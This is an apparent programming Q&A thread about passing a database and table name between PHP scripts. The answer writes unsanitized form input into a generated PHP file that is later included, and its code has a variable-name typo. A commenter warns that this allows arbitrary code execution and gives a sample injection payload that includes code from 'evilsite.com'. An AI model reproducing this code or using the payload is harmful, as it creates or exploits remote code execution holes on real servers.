# Using field data stored in constants, in multiple PHP scripts

Tags: php

I'm building a database modifying gui that executes basic queries. The user have to input the name of existing database and table name at the start. I'm using fields to take user input and then parsing them to a php script. I was using session variables to use the database name and table name in different php files. Is there a way to do this using `include` or `include_once`? or any other method that serves better than session variables in this situation? Keeping in mind that the script will be using GET to grab the input in the fields.

Comment: Why are you not using a form and the $_POST superglobal?

Comment: I'm using it. But it's only available in the script called on submit. What I want is to be able to use the field information in different scripts. for example I have different pages for deleting, updating and inserting new entries in the table. Each of them use a different script. I want to be able to use the Table name and db name in all of these scripts.

Comment: Oh ok, Ill answer it now

Answer (score -1):

Yes you can. You can have your php code create a php file (with the information about the database and table) which you can then include into whichever file you wish to use those variables in. First create the form that will be used for the input, something similar to the following:

index.php:

```
<form method="POST" action="phpscript.php">
  <input type="text" name="databaseName">
  <input type="text" name="tableName">
  <input type="submit" name="Submit" value="Submit">
</form>
```

then create the php code in the page that the form takes you to that will create the new php file:

phpscript.php:

```
<?php
$myFile = fopen("info.php", "w");
$myStrig = "<?php $tableName = ".$_POST['tableName']."; $databaseName = ".$_POST['databaseName']."; ?>";
fwrite($myFile, $myString);
fclose($myFile);
?>
```

Now whichever file that you would like to have access to variables `$tableName` and `$databaseName` would just need the following line of code:

```
include('info.php');
```

Also keep in mind that I am assuming that all the files are in the same directory. If you have them in different directories, you'll have to change the paths to those files.

Let me know if that helps you!

Comment: I think you misunderstood the question. I'm using this approach. but sadly, this only allows me use the values in one script. I want to be able use the values in different scripts. That's why I mentioned session variables in the question. They were doing a fine job. but I was just wondering if it's possible to use `include` or `require` instead. I tried doing it but as the script was dependent on the $_POST/ $_GET variables and it was being called from a different script.

Comment: @Muzammil Aziz, yes I understood your question now, and I updated my answer with the new answer.

Comment: Yes, Thanks alot. The edit surely answered the question. This solution never occurred to me.

Comment: @MuzammilAziz glad I could help dude :)

Comment: THIS CODE IS EXTREMELY DANGEROUS. Anyone with access to the form can run any code they like on the server. You should *at least* escape the strings and check they exist as databases and tables in the mysql schema before writing the file.

Comment: @symcbean could you give an example of what someone could do? I'm just answering the question Muzammil wanted answered, however now I'm interested in how the previous code could be exploited from the form?

Comment: Posting `atable'; include("http://evilsite.com/anycode.php")` as tablename (for example)

Comment: Can I use html5's pattern attribute to escape special characters using alphanumeric regex?

Comment: @MuzammilAziz I'm not sure. And did this solution work for you by any chance? If it did, please accept the solution with a green check mark so that future users know it worked :)